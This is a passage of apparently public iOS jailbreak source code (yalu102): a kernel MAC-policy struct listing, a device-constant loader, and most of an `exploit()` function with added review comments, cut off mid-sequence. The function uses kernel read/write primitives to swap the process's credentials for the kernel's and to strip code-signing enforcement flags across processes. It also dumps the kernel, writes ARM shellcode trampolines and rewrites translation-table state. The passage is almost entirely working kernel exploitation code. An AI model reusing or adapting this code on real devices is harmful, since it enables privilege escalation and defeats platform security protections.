| uint64_t mpo_ipq_label_destroy; 101 | uint64_t mpo_ipq_label_init; 102 | uint64_t mpo_ipq_label_update; 103 | uint64_t mpo_file_check_library_validation; 104 | uint64_t mpo_vnode_notify_setacl; 105 | uint64_t mpo_vnode_notify_setattrlist; 106 | uint64_t mpo_vnode_notify_setextattr; 107 | uint64_t mpo_vnode_notify_setflags; 108 | uint64_t mpo_vnode_notify_setmode; 109 | uint64_t mpo_vnode_notify_setowner; 110 | uint64_t mpo_vnode_notify_setutimes; 111 | uint64_t mpo_vnode_notify_truncate; 112 | uint64_t mpo_mbuf_label_associate_bpfdesc; 113 | uint64_t mpo_mbuf_label_associate_ifnet; 114 | uint64_t 
mpo_mbuf_label_associate_inpcb; 115 | uint64_t mpo_mbuf_label_associate_ipq; 116 | uint64_t mpo_mbuf_label_associate_linklayer; 117 | uint64_t mpo_mbuf_label_associate_multicast_encap; 118 | uint64_t mpo_mbuf_label_associate_netlayer; 119 | uint64_t mpo_mbuf_label_associate_socket; 120 | uint64_t mpo_mbuf_label_copy; 121 | uint64_t mpo_mbuf_label_destroy; 122 | uint64_t mpo_mbuf_label_init; 123 | uint64_t mpo_mount_check_fsctl; 124 | uint64_t mpo_mount_check_getattr; 125 | uint64_t mpo_mount_check_label_update; 126 | uint64_t mpo_mount_check_mount; 127 | uint64_t mpo_mount_check_remount; 128 | uint64_t mpo_mount_check_setattr; 129 | uint64_t mpo_mount_check_stat; 130 | uint64_t mpo_mount_check_umount; 131 | uint64_t mpo_mount_label_associate; 132 | uint64_t mpo_mount_label_destroy; 133 | uint64_t mpo_mount_label_externalize; 134 | uint64_t mpo_mount_label_init; 135 | uint64_t mpo_mount_label_internalize; 136 | uint64_t mpo_netinet_fragment; 137 | uint64_t mpo_netinet_icmp_reply; 138 | uint64_t mpo_netinet_tcp_reply; 139 | uint64_t mpo_pipe_check_ioctl; 140 | uint64_t mpo_pipe_check_kqfilter; 141 | uint64_t mpo_pipe_check_label_update; 142 | uint64_t mpo_pipe_check_read; 143 | uint64_t mpo_pipe_check_select; 144 | uint64_t mpo_pipe_check_stat; 145 | uint64_t mpo_pipe_check_write; 146 | uint64_t mpo_pipe_label_associate; 147 | uint64_t mpo_pipe_label_copy; 148 | uint64_t mpo_pipe_label_destroy; 149 | uint64_t mpo_pipe_label_externalize; 150 | uint64_t mpo_pipe_label_init; 151 | uint64_t mpo_pipe_label_internalize; 152 | uint64_t mpo_pipe_label_update; 153 | uint64_t mpo_policy_destroy; 154 | uint64_t mpo_policy_init; 155 | uint64_t mpo_policy_initbsd; 156 | uint64_t mpo_policy_syscall; 157 | uint64_t mpo_system_check_sysctlbyname; 158 | uint64_t mpo_proc_check_inherit_ipc_ports; 159 | uint64_t mpo_vnode_check_rename; 160 | uint64_t mpo_kext_check_query; 161 | uint64_t mpo_iokit_check_nvram_get; 162 | uint64_t mpo_iokit_check_nvram_set; 163 | uint64_t 
mpo_iokit_check_nvram_delete; 164 | uint64_t mpo_proc_check_expose_task; 165 | uint64_t mpo_proc_check_set_host_special_port; 166 | uint64_t mpo_proc_check_set_host_exception_port; 167 | uint64_t mpo_exc_action_check_exception_send; 168 | uint64_t mpo_exc_action_label_associate; 169 | uint64_t mpo_exc_action_label_copy; 170 | uint64_t mpo_exc_action_label_destroy; 171 | uint64_t mpo_exc_action_label_init; 172 | uint64_t mpo_exc_action_label_update; 173 | uint64_t mpo_reserved1; 174 | uint64_t mpo_reserved2; 175 | uint64_t mpo_reserved3; 176 | uint64_t mpo_reserved4; 177 | uint64_t mpo_reserved5; 178 | uint64_t mpo_reserved6; 179 | uint64_t mpo_posixsem_check_create; 180 | uint64_t mpo_posixsem_check_open; 181 | uint64_t mpo_posixsem_check_post; 182 | uint64_t mpo_posixsem_check_unlink; 183 | uint64_t mpo_posixsem_check_wait; 184 | uint64_t mpo_posixsem_label_associate; 185 | uint64_t mpo_posixsem_label_destroy; 186 | uint64_t mpo_posixsem_label_init; 187 | uint64_t mpo_posixshm_check_create; 188 | uint64_t mpo_posixshm_check_mmap; 189 | uint64_t mpo_posixshm_check_open; 190 | uint64_t mpo_posixshm_check_stat; 191 | uint64_t mpo_posixshm_check_truncate; 192 | uint64_t mpo_posixshm_check_unlink; 193 | uint64_t mpo_posixshm_label_associate; 194 | uint64_t mpo_posixshm_label_destroy; 195 | uint64_t mpo_posixshm_label_init; 196 | uint64_t mpo_proc_check_debug; 197 | uint64_t mpo_proc_check_fork; 198 | uint64_t mpo_proc_check_get_task_name; 199 | uint64_t mpo_proc_check_get_task; 200 | uint64_t mpo_proc_check_getaudit; 201 | uint64_t mpo_proc_check_getauid; 202 | uint64_t mpo_proc_check_getlcid; 203 | uint64_t mpo_proc_check_mprotect; 204 | uint64_t mpo_proc_check_sched; 205 | uint64_t mpo_proc_check_setaudit; 206 | uint64_t mpo_proc_check_setauid; 207 | uint64_t mpo_proc_check_setlcid; 208 | uint64_t mpo_proc_check_signal; 209 | uint64_t mpo_proc_check_wait; 210 | uint64_t mpo_proc_label_destroy; 211 | uint64_t mpo_proc_label_init; 212 | uint64_t 
mpo_socket_check_accept; 213 | uint64_t mpo_socket_check_accepted; 214 | uint64_t mpo_socket_check_bind; 215 | uint64_t mpo_socket_check_connect; 216 | uint64_t mpo_socket_check_create; 217 | uint64_t mpo_socket_check_deliver; 218 | uint64_t mpo_socket_check_kqfilter; 219 | uint64_t mpo_socket_check_label_update; 220 | uint64_t mpo_socket_check_listen; 221 | uint64_t mpo_socket_check_receive; 222 | uint64_t mpo_socket_check_received; 223 | uint64_t mpo_socket_check_select; 224 | uint64_t mpo_socket_check_send; 225 | uint64_t mpo_socket_check_stat; 226 | uint64_t mpo_socket_check_setsockopt; 227 | uint64_t mpo_socket_check_getsockopt; 228 | uint64_t mpo_socket_label_associate_accept; 229 | uint64_t mpo_socket_label_associate; 230 | uint64_t mpo_socket_label_copy; 231 | uint64_t mpo_socket_label_destroy; 232 | uint64_t mpo_socket_label_externalize; 233 | uint64_t mpo_socket_label_init; 234 | uint64_t mpo_socket_label_internalize; 235 | uint64_t mpo_socket_label_update; 236 | uint64_t mpo_socketpeer_label_associate_mbuf; 237 | uint64_t mpo_socketpeer_label_associate_socket; 238 | uint64_t mpo_socketpeer_label_destroy; 239 | uint64_t mpo_socketpeer_label_externalize; 240 | uint64_t mpo_socketpeer_label_init; 241 | uint64_t mpo_system_check_acct; 242 | uint64_t mpo_system_check_audit; 243 | uint64_t mpo_system_check_auditctl; 244 | uint64_t mpo_system_check_auditon; 245 | uint64_t mpo_system_check_host_priv; 246 | uint64_t mpo_system_check_nfsd; 247 | uint64_t mpo_system_check_reboot; 248 | uint64_t mpo_system_check_settime; 249 | uint64_t mpo_system_check_swapoff; 250 | uint64_t mpo_system_check_swapon; 251 | uint64_t mpo_reserved7; 252 | uint64_t mpo_sysvmsg_label_associate; 253 | uint64_t mpo_sysvmsg_label_destroy; 254 | uint64_t mpo_sysvmsg_label_init; 255 | uint64_t mpo_sysvmsg_label_recycle; 256 | uint64_t mpo_sysvmsq_check_enqueue; 257 | uint64_t mpo_sysvmsq_check_msgrcv; 258 | uint64_t mpo_sysvmsq_check_msgrmid; 259 | uint64_t mpo_sysvmsq_check_msqctl; 260 | 
uint64_t mpo_sysvmsq_check_msqget; 261 | uint64_t mpo_sysvmsq_check_msqrcv; 262 | uint64_t mpo_sysvmsq_check_msqsnd; 263 | uint64_t mpo_sysvmsq_label_associate; 264 | uint64_t mpo_sysvmsq_label_destroy; 265 | uint64_t mpo_sysvmsq_label_init; 266 | uint64_t mpo_sysvmsq_label_recycle; 267 | uint64_t mpo_sysvsem_check_semctl; 268 | uint64_t mpo_sysvsem_check_semget; 269 | uint64_t mpo_sysvsem_check_semop; 270 | uint64_t mpo_sysvsem_label_associate; 271 | uint64_t mpo_sysvsem_label_destroy; 272 | uint64_t mpo_sysvsem_label_init; 273 | uint64_t mpo_sysvsem_label_recycle; 274 | uint64_t mpo_sysvshm_check_shmat; 275 | uint64_t mpo_sysvshm_check_shmctl; 276 | uint64_t mpo_sysvshm_check_shmdt; 277 | uint64_t mpo_sysvshm_check_shmget; 278 | uint64_t mpo_sysvshm_label_associate; 279 | uint64_t mpo_sysvshm_label_destroy; 280 | uint64_t mpo_sysvshm_label_init; 281 | uint64_t mpo_sysvshm_label_recycle; 282 | uint64_t mpo_reserved8; 283 | uint64_t mpo_reserved9; 284 | uint64_t mpo_vnode_check_getattr; 285 | uint64_t mpo_mount_check_snapshot_create; 286 | uint64_t mpo_mount_check_snapshot_delete; 287 | uint64_t mpo_vnode_check_clone; 288 | uint64_t mpo_proc_check_get_cs_info; 289 | uint64_t mpo_proc_check_set_cs_info; 290 | uint64_t mpo_iokit_check_hid_control; 291 | uint64_t mpo_vnode_check_access; 292 | uint64_t mpo_vnode_check_chdir; 293 | uint64_t mpo_vnode_check_chroot; 294 | uint64_t mpo_vnode_check_create; 295 | uint64_t mpo_vnode_check_deleteextattr; 296 | uint64_t mpo_vnode_check_exchangedata; 297 | uint64_t mpo_vnode_check_exec; 298 | uint64_t mpo_vnode_check_getattrlist; 299 | uint64_t mpo_vnode_check_getextattr; 300 | uint64_t mpo_vnode_check_ioctl; 301 | uint64_t mpo_vnode_check_kqfilter; 302 | uint64_t mpo_vnode_check_label_update; 303 | uint64_t mpo_vnode_check_link; 304 | uint64_t mpo_vnode_check_listextattr; 305 | uint64_t mpo_vnode_check_lookup; 306 | uint64_t mpo_vnode_check_open; 307 | uint64_t mpo_vnode_check_read; 308 | uint64_t mpo_vnode_check_readdir; 309 | 
uint64_t mpo_vnode_check_readlink; 310 | uint64_t mpo_vnode_check_rename_from; 311 | uint64_t mpo_vnode_check_rename_to; 312 | uint64_t mpo_vnode_check_revoke; 313 | uint64_t mpo_vnode_check_select; 314 | uint64_t mpo_vnode_check_setattrlist; 315 | uint64_t mpo_vnode_check_setextattr; 316 | uint64_t mpo_vnode_check_setflags; 317 | uint64_t mpo_vnode_check_setmode; 318 | uint64_t mpo_vnode_check_setowner; 319 | uint64_t mpo_vnode_check_setutimes; 320 | uint64_t mpo_vnode_check_stat; 321 | uint64_t mpo_vnode_check_truncate; 322 | uint64_t mpo_vnode_check_unlink; 323 | uint64_t mpo_vnode_check_write; 324 | uint64_t mpo_vnode_label_associate_devfs; 325 | uint64_t mpo_vnode_label_associate_extattr; 326 | uint64_t mpo_vnode_label_associate_file; 327 | uint64_t mpo_vnode_label_associate_pipe; 328 | uint64_t mpo_vnode_label_associate_posixsem; 329 | uint64_t mpo_vnode_label_associate_posixshm; 330 | uint64_t mpo_vnode_label_associate_singlelabel; 331 | uint64_t mpo_vnode_label_associate_socket; 332 | uint64_t mpo_vnode_label_copy; 333 | uint64_t mpo_vnode_label_destroy; 334 | uint64_t mpo_vnode_label_externalize_audit; 335 | uint64_t mpo_vnode_label_externalize; 336 | uint64_t mpo_vnode_label_init; 337 | uint64_t mpo_vnode_label_internalize; 338 | uint64_t mpo_vnode_label_recycle; 339 | uint64_t mpo_vnode_label_store; 340 | uint64_t mpo_vnode_label_update_extattr; 341 | uint64_t mpo_vnode_label_update; 342 | uint64_t mpo_vnode_notify_create; 343 | uint64_t mpo_vnode_check_signature; 344 | uint64_t mpo_vnode_check_uipc_bind; 345 | uint64_t mpo_vnode_check_uipc_connect; 346 | uint64_t mpo_proc_check_run_cs_invalid; 347 | uint64_t mpo_proc_check_suspend_resume; 348 | uint64_t mpo_thread_userret; 349 | uint64_t mpo_iokit_check_set_properties; 350 | uint64_t mpo_system_check_chud; 351 | uint64_t mpo_vnode_check_searchfs; 352 | uint64_t mpo_priv_check; 353 | uint64_t mpo_priv_grant; 354 | uint64_t mpo_proc_check_map_anon; 355 | uint64_t mpo_vnode_check_fsgetpath; 356 | uint64_t 
mpo_iokit_check_open; 357 | uint64_t mpo_proc_check_ledger; 358 | uint64_t mpo_vnode_notify_rename; 359 | uint64_t mpo_vnode_check_setacl; 360 | uint64_t mpo_vnode_notify_deleteextattr; 361 | uint64_t mpo_system_check_kas_info; 362 | uint64_t mpo_proc_check_cpumon; 363 | uint64_t mpo_vnode_notify_open; 364 | uint64_t mpo_system_check_info; 365 | uint64_t mpo_pty_notify_grant; 366 | uint64_t mpo_pty_notify_close; 367 | uint64_t mpo_vnode_find_sigs; 368 | uint64_t mpo_kext_check_load; 369 | uint64_t mpo_kext_check_unload; 370 | uint64_t mpo_proc_check_proc_info; 371 | uint64_t mpo_vnode_notify_link; 372 | uint64_t mpo_iokit_check_filter_properties; 373 | uint64_t mpo_iokit_check_get_property; 374 | }; 375 | 376 | 377 | 378 | #endif /* devicesupport_h */ 379 | -------------------------------------------------------------------------------- /SourceCode/yalu102/devicesupport.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "devicesupport.h" 3 | #import 4 | #import 5 | 6 | 7 | NSMutableArray* consttable = nil; 8 | NSMutableArray* collide = nil; 9 | int constload() { 10 | struct utsname uts; 11 | uname(&uts); 12 | if (strstr(uts.version, "Marijuan")) { 13 | return -2; 14 | } 15 | 16 | NSString* strv = [NSString stringWithUTF8String:uts.version]; 17 | NSArray *dp =[[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"def" ofType:@"plist"]]; 18 | int m = 0; 19 | collide = [NSMutableArray new]; 20 | 21 | for (NSDictionary* dict in dp) { 22 | if ([dict[@"vers"] isEqualToString:strv]) { 23 | [collide setObject:[NSMutableArray new] atIndexedSubscript:m]; 24 | int i = 0; 25 | for (NSString* str in dict[@"val"]) { 26 | [collide[m] setObject:[NSNumber numberWithUnsignedLongLong:strtoull([str UTF8String], 0, 0)] atIndexedSubscript:i]; 27 | i++; 28 | } 29 | m++; 30 | } 31 | } 32 | if (m) { 33 | return 0; 34 | } 35 | return -1; 36 | } 37 | char affine_const_by_surfacevt(uint64_t surfacevt_slid) 38 
| { 39 | for (NSArray* arr in collide) { 40 | if ((surfacevt_slid & (0xfffff)) == ([[arr objectAtIndex:1] unsignedLongLongValue] & 0xfffff)) { 41 | NSLog(@"affined"); 42 | consttable = arr; 43 | return 0; 44 | } 45 | } 46 | return -1; 47 | } 48 | uint64_t constget(int idx){ 49 | return [[consttable objectAtIndex:idx] unsignedLongLongValue]; 50 | } 51 | -------------------------------------------------------------------------------- /SourceCode/yalu102/iokitmig64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/iokitmig64.o -------------------------------------------------------------------------------- /SourceCode/yalu102/jailbreak.m: -------------------------------------------------------------------------------- 1 | // 2 | // jailbreak.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 07/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | #undef __IPHONE_OS_VERSION_MIN_REQUIRED 11 | #import 12 | #import "devicesupport.h" 13 | 14 | #import "IOKit/IOKitLib.h" 15 | #import 16 | #import 17 | #import 18 | #import 19 | #import 20 | 21 | #import "devicesupport.h" 22 | #import 23 | #import 24 | #import 25 | #import 26 | #import 27 | #import 28 | #import 29 | 30 | #import "patchfinder64.h" 31 | 32 | #define vm_address_t mach_vm_address_t 33 | 34 | mach_port_t tfp0=0; 35 | uint64_t slide=0; 36 | io_connect_t funcconn=0; 37 | // #define NSLog(...) 
// Local prototypes for the mach_vm_* routines used below.
kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection);
kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);

/*
 * Issues IOConnectTrap4 on the `funcconn` connection with index 0.
 * Note the argument order passed to the trap: x1, x2, x0, addr.
 */
uint32_t FuncAnywhere32(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2)
{
    return IOConnectTrap4(funcconn, 0, x1, x2, x0, addr);
}

/*
 * Copies `size` bytes from address `from` in the task behind tfp0 into the
 * local buffer `to`, in chunks of at most 0x1000 bytes.
 *
 * NOTE(review): the kern_return_t of mach_vm_read_overwrite is discarded, so a
 * failed read leaves the destination unchanged and the caller is not told.
 */
void copyin(void* to, uint64_t from, size_t size) {
    mach_vm_size_t outsize = size;
    size_t szt = size; // bytes still to copy
    if (size > 0x1000) {
        size = 0x1000;
    }
    size_t off = 0; // offset of the current chunk
    while (1) {
        mach_vm_read_overwrite(tfp0, off+from, size, (mach_vm_offset_t)(off+to), &outsize);
        szt -= size;
        off += size;
        if (szt == 0) {
            break;
        }
        size = szt;
        if (size > 0x1000) {
            size = 0x1000;
        }

    }
}

/*
 * Writes `size` bytes from the local buffer `from` to address `to` in the task
 * behind tfp0 with a single mach_vm_write call; the result is not checked.
 */
void copyout(uint64_t to, void* from, size_t size) {
    mach_vm_write(tfp0, to, (vm_offset_t)from, (mach_msg_type_number_t)size);
}

/* Reads 8 bytes at addr through copyin(); val starts at 0 and stays 0 if nothing is read. */
uint64_t ReadAnywhere64(uint64_t addr) {
    uint64_t val = 0;
    copyin(&val, addr, 8);
    return val;
}

/* Writes the 8-byte val at addr through copyout() and returns val. */
uint64_t WriteAnywhere64(uint64_t addr, uint64_t val) {
    copyout(addr, &val, 8);
    return val;
}

/* Reads 4 bytes at addr through copyin(); val starts at 0 and stays 0 if nothing is read. */
uint32_t ReadAnywhere32(uint64_t addr) {
    uint32_t val = 0;
    copyin(&val, addr, 4);
    return val;
}

/* Writes the 4-byte val at addr through copyout() and returns val (widened to 64 bits). */
uint64_t WriteAnywhere32(uint64_t addr, uint32_t val) {
    copyout(addr, &val, 4);
    return val;
}

#import "pte_stuff.h"

/*
 * Applies this project's kernel patches and installs its userland files.
 *
 * Parameters:
 *   btn      - not referenced anywhere in the body.
 *   pt       - Mach port stored in tfp0 and used as the target task for every
 *              read and write below.
 *   kernbase - address of the kernel Mach-O header.
 *   allprocs - offset, relative to kernbase, of the head of the process list.
 *
 * Stages, in the order they appear:
 *   1. open an IOSurfaceRoot user client;
 *   2. walk the process list, change code-signing flags and swap this
 *      process's credential pointer;
 *   3. copy the kernel image into user memory and hand it to the patchfinder;
 *   4. build trampolines and a private copy of a translation table;
 *   5. patch code and policy tables through remapped pages;
 *   6. remount "/", install files and load a launch daemon.
 *
 * Names such as checkvad, isvad, uref, physalloc, findphys_real, pagestuff_64,
 * the TTE_* macros, gPhysBase, gVirtBase, level1_table and the find_* helpers
 * are defined outside this listing (presumably pte_stuff.h and
 * patchfinder64.h), so the comments here describe only how they are used.
 *
 * NOTE(review): the return values of the Mach, IOKit and libc calls in this
 * function are ignored throughout, and the malloc/calloc buffers are never
 * freed.
 */
void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs)
{
    /* ---- Stage 1: open a user client on the first IOSurfaceRoot service ---- */
    io_iterator_t iterator;
    IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"), &iterator);
    io_object_t servicex = IOIteratorNext(iterator);
    funcconn = 0;
    IOServiceOpen(servicex, mach_task_self(), 0, &funcconn);
    assert(funcconn);

    tfp0 = pt;

    /* ---- Stage 2: process list, code-signing flags, credentials ---- */
    uint64_t bsd_task=0;
    uint64_t launchd_task = 0; // located below but not used again in this function
    {
        // Each entry's first 8 bytes are followed as the link to the next entry;
        // the 32-bit value at +0x10 is treated as the pid.
        uint64_t proc = ReadAnywhere64(allprocs+kernbase);
        NSLog(@"found procs at %llx", proc);
        while (proc) {
            uint32_t pid = ReadAnywhere32(proc+0x10);
            if (pid == getpid()) {
                bsd_task = proc;
            } else
                if (pid == 1) {
                    launchd_task = proc;
                }

            if (launchd_task && bsd_task) break;

            proc = ReadAnywhere64(proc);
        }
    }
    // +0x100 is read as this process's credential pointer (going by the variable name).
    uint64_t cred = ReadAnywhere64(bsd_task+0x100);

    uint64_t credpatch = 0;
    uint64_t proc = bsd_task;
    // From this process onward to pid 0, every visited entry has its flags word
    // at +0x2a8 rewritten: CS_PLATFORM_BINARY, CS_INSTALLER and
    // CS_GET_TASK_ALLOW are set, CS_RESTRICT, CS_KILL and CS_HARD are cleared.
    while (proc) {
        uint32_t pid = ReadAnywhere32(proc+0x10);
        uint32_t csflags = ReadAnywhere32(proc+0x2a8);
        csflags |= CS_PLATFORM_BINARY|CS_INSTALLER|CS_GET_TASK_ALLOW;
        csflags &= ~(CS_RESTRICT|CS_KILL|CS_HARD);
        WriteAnywhere32(proc+0x2a8, csflags);
        if (pid == 0) {
            credpatch = ReadAnywhere64(proc+0x100);
            break;
        }
        proc = ReadAnywhere64(proc);
    }

    uint64_t orig_cred = cred;

    // This process now points at pid 0's credential; orig_cred is written back
    // at the very end of the function.
    WriteAnywhere64(bsd_task+0x100, credpatch);

    checkvad(); // presumably sets isvad, which selects 4K versus 16K pages below; confirm in pte_stuff.h

    /* ---- Stage 3: copy the kernel image into user memory ---- */
    vm_address_t vmd = 0;
    _kernelrpc_mach_vm_allocate_trap(mach_task_self(), &vmd, 0x4000, VM_FLAGS_ANYWHERE);

    // The first 0x4000 bytes are enough to read the Mach-O header and load commands.
    copyin((void*)vmd, kernbase, 0x4000);

    struct mach_header_64* vmk = vmd;
    uint64_t max = 0;
    uint64_t min = -1;

    // First pass: lowest and highest address covered by any LC_SEGMENT_64.
    struct load_command* lc = vmk+1;
    for (int k=0; k < vmk->ncmds; k++) {

        if (lc->cmd == LC_SEGMENT_64) {
            struct segment_command_64* sg = lc;
            NSLog(@"seg: %s", sg->segname);
            if (sg->vmaddr < min) {
                min = sg->vmaddr;
            }
            if (sg->vmaddr + sg->vmsize > max) {
                max = sg->vmaddr+sg->vmsize;
            }
        }

        lc = ((char*)lc) + lc->cmdsize;
    }

    NSLog(@"%llx - %llx", min, max);

    char* kdump = malloc(max-min);

    // Copy the whole [min, max) range in 0x4000-byte pieces.
    for (int k=0; k < (max-min)/0x4000; k++) {
        copyin(kdump+k*0x4000, min+k*0x4000, 0x4000);
    }

    NSLog(@"%llx", kdump);
    uint64_t kerndumpsize = 0;
    uint64_t gadget_base = 0;
    uint64_t gadget_size = 0;
    uint64_t prelink_base = 0;
    uint64_t prelink_size = 0;
    uint64_t kerndumpbase = -1;


    // Second pass, over the local copy: record the __TEXT_EXEC and
    // __PLK_TEXT_EXEC segments and the entry point from LC_UNIXTHREAD.
    struct mach_header_64* mh_kern = (struct mach_header_64*) (kdump+kernbase-min);
    struct load_command* load_cmd = (struct load_command*)(mh_kern+1);

    uint64_t entryp = 0;

    for (int i = 0; i < mh_kern->ncmds; i++) {

        if (load_cmd->cmd == LC_SEGMENT_64) {
            struct segment_command_64* seg = (struct segment_command_64*)load_cmd;
            //NSLog(@"found segment %s", seg->segname);

            if (strcmp(seg->segname, "__TEXT_EXEC") == 0) {
                gadget_base = seg->vmaddr;
                gadget_size = seg->filesize;
            }
            if (strcmp(seg->segname, "__PLK_TEXT_EXEC") == 0) {
                prelink_base = seg->vmaddr;
                prelink_size = seg->filesize;
            }

            if (seg->vmaddr < kerndumpbase) {
                kerndumpbase = seg->vmaddr;
            }
            kerndumpsize += seg->vmsize;
        } else if (load_cmd->cmd == LC_UNIXTHREAD) {
            struct {
                unsigned long cmd; /* LC_THREAD or LC_UNIXTHREAD */
                unsigned long cmdsize; /* total size of this command */
                unsigned long flavor; /* flavor of thread state */
                unsigned long count; /* count of longs in thread state */
                struct {
                    __uint64_t __x[29]; /* General purpose registers x0-x28 */
                    __uint64_t __fp; /* Frame pointer x29 */
                    __uint64_t __lr; /* Link register x30 */
                    __uint64_t __sp; /* Stack pointer x31 */
                    __uint64_t __pc; /* Program counter */
                    __uint32_t __cpsr; /* Current program status register */
                    __uint32_t __pad; /* Same size for 32-bit or 64-bit clients */
                } state;
            } * thr = load_cmd;
            entryp = thr->state.__pc;
        }

        load_cmd = (struct load_command*)(load_cmd->cmdsize + (vm_address_t)(load_cmd));
    }
    // Hand the copy and the two executable ranges to the patchfinder.
    set_dump(kerndumpbase, kerndumpsize, (uint8_t*)kdump);
    set_text_exec(gadget_base, gadget_size);
    set_prelink_exec(prelink_base, prelink_size);

    uint64_t gStoreBase = find_gPhysBase();

    // Two consecutive 8-byte values: physical base, then virtual base. They are
    // used below to convert between physical and virtual kernel addresses.
    gPhysBase = ReadAnywhere64(gStoreBase);
    gVirtBase = ReadAnywhere64(gStoreBase+8);

    entryp += slide;
    uint64_t rvbar = entryp & (~0xFFF); // entry point rounded down to a 4K boundary

    uint64_t cpul = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), rvbar-gadget_base+0x40, text_exec_base, 1);

    uint64_t optr = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), rvbar-gadget_base+0x50, text_exec_base, 20);
    if (uref) {
        optr = ReadAnywhere64(optr) - gPhysBase + gVirtBase;
    }
    NSLog(@"%llx", optr);

    uint64_t cpu_list = ReadAnywhere64(cpul - 0x10 /*the add 0x10, 0x10 instruction confuses findregval*/) - gPhysBase + gVirtBase;
    uint64_t cpu = ReadAnywhere64(cpu_list);

    uint64_t pmap_store = find_kernel_pmap();
    NSLog(@"pmap: %llx", pmap_store);
    level1_table = ReadAnywhere64(ReadAnywhere64(pmap_store));




    /* ---- Stage 4: trampolines and a private translation-table copy ---- */
    uint64_t shellcode = physalloc(0x4000);

    /*
     ldr x30, a
     ldr x0, b
     br x0
     nop
     a:
     .quad 0
     b:
     .quad 0
     none of that squad shit tho, straight gang shit. free rondonumbanine
     */

    WriteAnywhere32(shellcode + 0x100, 0x5800009e); /* trampoline for idlesleep */
    WriteAnywhere32(shellcode + 0x100 + 4, 0x580000a0);
    WriteAnywhere32(shellcode + 0x100 + 8, 0xd61f0000);

    WriteAnywhere32(shellcode + 0x200, 0x5800009e); /* trampoline for deepsleep */
    WriteAnywhere32(shellcode + 0x200 + 4, 0x580000a0);
    WriteAnywhere32(shellcode + 0x200 + 8, 0xd61f0000);

    // Copy 0x100 bytes from optr into the same allocation at +0x300.
    char buf[0x100];
    copyin(buf, optr, 0x100);
    copyout(shellcode+0x300, buf, 0x100);

    uint64_t physcode = findphys_real(shellcode);



    NSLog(@"got phys at %llx for virt %llx", physcode, shellcode);

    uint64_t idlesleep_handler = 0;

    // Addresses of each CPU entry's +0x130 slot; they are all rewritten after
    // the patches are in place.
    // NOTE(review): z is never checked against the 12-element capacity.
    uint64_t plist[12]={0,0,0,0,0,0,0,0,0,0,0,0};
    int z = 0;

    int idx = 0;
    int ridx = 0;
    while (cpu) {
        cpu = cpu - gPhysBase + gVirtBase;
        // physcode+0x100 is what the loop near the end stores in this slot, so
        // low bits equal to 0x100 mean a previous run already patched it.
        if ((ReadAnywhere64(cpu+0x130) & 0x3FFF) == 0x100) {
            NSLog(@"already jailbroken, bailing out");
            return;
        }


        if (!idlesleep_handler) {
            WriteAnywhere64(shellcode + 0x100 + 0x18, ReadAnywhere64(cpu+0x130)); // idlehandler
            WriteAnywhere64(shellcode + 0x200 + 0x18, ReadAnywhere64(cpu+0x130) + 12); // deephandler

            idlesleep_handler = ReadAnywhere64(cpu+0x130) - gPhysBase + gVirtBase;


            // Scan the first 0x1000 bytes of the handler for `br x0`, then for
            // the following `ret`.
            // NOTE(review): neither scan stops at the end of the 0x1000-byte buffer.
            uint32_t* opcz = malloc(0x1000);
            copyin(opcz, idlesleep_handler, 0x1000);
            idx = 0;
            while (1) {
                if (opcz[idx] == 0xd61f0000 /* br x0 */) {
                    break;
                }
                idx++;
            }
            ridx = idx;
            while (1) {
                if (opcz[ridx] == 0xd65f03c0 /* ret */) {
                    break;
                }
                ridx++;
            }


        }

        NSLog(@"found cpu %x", ReadAnywhere32(cpu+0x330));
        NSLog(@"found physz: %llx", ReadAnywhere64(cpu+0x130) - gPhysBase + gVirtBase);

        plist[z++] = cpu+0x130;
        cpu_list += 0x10;
        cpu = ReadAnywhere64(cpu_list);
    }


    uint64_t shc = physalloc(0x4000);

    uint64_t regi = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), idlesleep_handler+12-gadget_base, text_exec_base, 30);
    uint64_t regd = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), idlesleep_handler+24-gadget_base, text_exec_base, 30);

    NSLog(@"%llx - %llx", regi, regd);

    // Pre-fill the first 0x500 bytes with 0xd503201f, the word the later
    // sequences in this function label as nop.
    for (int i = 0; i < 0x500/4; i++) {
        WriteAnywhere32(shc+i*4, 0xd503201f);
    }

    /*
     isvad 0 == 0x4000
     */

    uint64_t level0_pte = physalloc(isvad == 0 ? 0x4000 : 0x1000);

    uint64_t ttbr0_real = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), idlesleep_handler + idx*4 - gadget_base + 24, text_exec_base, 1);

    NSLog(@"ttbr0: %llx %llx",ReadAnywhere64(ttbr0_real), ttbr0_real);

    // Duplicate the table whose physical address is stored at ttbr0_real into
    // the new allocation; physp is the physical address of that duplicate.
    char* bbuf = malloc(0x4000);
    copyin(bbuf, ReadAnywhere64(ttbr0_real) - gPhysBase + gVirtBase, isvad == 0 ? 0x4000 : 0x1000);
    copyout(level0_pte, bbuf, isvad == 0 ? 0x4000 : 0x1000);

    uint64_t physp = findphys_real(level0_pte);


    // Two near-identical sequences, at shc and shc+0x100, that load physp into
    // TTBR1_EL1; they differ only in the value stored at +40 (regi or regd).
    WriteAnywhere32(shc, 0x5800019e); // ldr x30, #40
    WriteAnywhere32(shc+4, 0xd518203e); // msr ttbr1_el1, x30
